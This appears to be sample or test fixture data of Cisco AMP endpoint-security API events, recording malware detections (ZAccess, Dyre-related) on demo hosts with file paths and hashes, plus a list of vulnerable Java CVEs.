-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":692000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182413","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":659000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182412","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"\\\\?\\C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":634000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182411","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":606000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182410","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":583000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182409","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":320000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182408","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":98000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182407","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":16000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182406","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955900400000800,"timestamp":1610705109,"timestamp_nanoseconds":400000000,"date":"2021-01-15T10:05:09+00:00","event_type":"Multiple Infected Files","event_type_id":1107296258,"detection":"W32.ZAccess.15nt","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610705109,"start_date":"2021-01-15T10:05:09+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20"},"parent":{"disposition":"Clean","identity":{"sha256":"0b4eefc0d815ac0fdc20f22add8fd2d8113be99578a4e5189122b28b201ccbd9"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255854610743000,"timestamp":1610705106,"timestamp_nanoseconds":293000000,"date":"2021-01-15T10:05:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255854610743321","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955899799000300,"timestamp":1610705105,"timestamp_nanoseconds":799000000,"date":"2021-01-15T10:05:05+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610705105,"start_date":"2021-01-15T10:05:05+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"java.exe","identity":{"sha256":"0b4eefc0d815ac0fdc20f22add8fd2d8113be99578a4e5189122b28b201ccbd9"}},"vulnerabilities":[{"name":"Oracle Java(TM) Platform SE","version":"1.7.0:update_10","cve":"CVE-2013-5830","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5830"},{"cve":"CVE-2013-5843","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5843"},{"cve":"CVE-2013-5842","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5842"},{"cve":"CVE-2013-5817","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5817"},{"cve":"CVE-2013-5814","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5814"},{"cve":"CVE-2013-5809","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5809"},{"cve":"CVE-2013-5789","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5789"},{"cve":"CVE-2013-5829","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5829"},{"cve":"CVE-2013-5788","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5788"},{"cve":"CVE-2013-5824","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5824"},{"cve":"CVE-2013-5787","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5787"},{"cve":"CVE-2013-5782","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5782"},{"cve":"CVE-2013-2470","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2470"},{"cve":"CVE-2013-2465","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2465"},{"cve":"CVE-2013-2471","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2471"},{"cve":"CVE-2013-2473","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2473"},{"cve":"CVE-2013-2472","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2472"},{"cve":"CVE-2013-2469","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2469"},{"cve":"CVE-2013-2468","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2468"},{"cve":"CVE-2013-2466","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2466"},{"cve":"CVE-2013-2464","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2464"},{"cve":"CVE-2013-2463","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2463"},{"cve":"CVE-2013-2459","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2459"},{"cve":"CVE-2013-2428","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2428"},{"cve":"CVE-2013-2420","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2420"},{"cve":"CVE-2013-2434","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2434"},{"cve":"CVE-2013-2384","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2384"},{"cve":"CVE-2013-1518","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1518"},{"cve":"CVE-2013-1537","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1537"},{"cve":"CVE-2013-2440","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2440"},{"cve":"CVE-2013-1557","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1557"},{"cve":"CVE-2013-1558","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1558"},{"cve":"CVE-2013-2435","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2435"},{"cve":"CVE-2013-2432","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2432"},{"cve":"CVE-2013-1569","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1569"},{"cve":"CVE-2013-2431","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2431"},{"cve":"CVE-2013-2383","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2383"},{"cve":"CVE-2013-2427","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2427"},{"cve":"CVE-2013-2425","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2425"},{"cve":"CVE-2013-2422","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2422"},{"cve":"CVE-2013-2414","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2414"},{"cve":"CVE-2013-0809","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0809"},{"cve":"CVE-2013-1493","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1493"},{"cve":"CVE-2013-1480","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1480"},{"cve":"CVE-2013-0428","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0428"},{"cve":"CVE-2013-0437","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0437"},{"cve":"CVE-2013-0441","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0441"},{"cve":"CVE-2013-0442","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0442"},{"cve":"CVE-2013-0445","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0445"},{"cve":"CVE-2013-0450","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0450"},{"cve":"CVE-2013-1476","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1476"},{"cve":"CVE-2013-1478","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1478"},{"cve":"CVE-2013-1479","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1479"},{"cve":"CVE-2013-1484","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1484"},{"cve":"CVE-2013-0426","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0426"},{"cve":"CVE-2013-1486","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1486"},{"cve":"CVE-2013-1487","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1487"},{"cve":"CVE-2013-0425","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0425"},{"cve":"CVE-2013-0422","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0422"},{"cve":"CVE-2013-0446","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0446"},{"cve":"CVE-2013-1475","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1475"},{"cve":"CVE-2013-2460","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2460"},{"cve":"CVE-2013-5838","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5838"},{"cve":"CVE-2013-5777","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5777"},{"cve":"CVE-2013-5810","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5810"},{"cve":"CVE-2013-5832","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5832"},{"cve":"CVE-2013-5806","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5806"},{"cve":"CVE-2013-5805","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5805"},{"cve":"CVE-2013-5850","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5850"},{"cve":"CVE-2013-5844","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5844"},{"cve":"CVE-2013-5846","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5846"},{"cve":"CVE-2013-2462","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2462"},{"cve":"CVE-2013-2436","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2436"},{"cve":"CVE-2013-2426","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2426"},{"cve":"CVE-2013-2421","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2421"},{"cve":"CVE-2013-2445","score":7.8,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2445"},{"cve":"CVE-2013-5852","score":7.6,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5852"},{"cve":"CVE-2013-2448","score":7.6,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2448"},{"cve":"CVE-2013-2394","score":7.6,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2394"},{"cve":"CVE-2013-2429","score":7.6,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2429"},{"cve":"CVE-2013-2430","score":7.6,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2430"},{"cve":"CVE-2013-1563","score":7.6,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1563"},{"cve":"CVE-2013-0429","score":7.6,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0429"},{"cve":"CVE-2013-0444","score":7.6,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0444"},{"cve":"CVE-2013-0419","score":7.6,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0419"},{"cve":"CVE-2013-0423","score":7.6,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0423"},{"cve":"CVE-2013-5775","score":7.5,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5775"},{"cve":"CVE-2013-5802","score":7.5,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5802"},{"cve":"CVE-2013-2442","score":7.5,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2442"},{"cve":"CVE-2013-2461","score":7.5,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2461"},{"cve":"CVE-2013-0351","score":7.5,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0351"},{"cve":"CVE-2013-2439","score":6.9,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2439"},{"cve":"CVE-2013-0430","score":6.9,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0430"},{"cve":"CVE-2013-3829","score":6.4,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3829"},{"cve":"CVE-2013-5783","score":6.4,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5783"},{"cve":"CVE-2013-5804","score":6.4,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5804"},{"cve":"CVE-2013-5812","score":6.4,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5812"},{"cve":"CVE-2013-2407","score":6.4,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2407"},{"cve":"CVE-2013-0432","score":6.4,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0432"}]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255807366103000,"timestamp":1610705095,"timestamp_nanoseconds":45000000,"date":"2021-01-15T10:04:55+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255807366103064","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255777301332000,"timestamp":1610705088,"timestamp_nanoseconds":259000000,"date":"2021-01-15T10:04:48+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255777301331991","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} 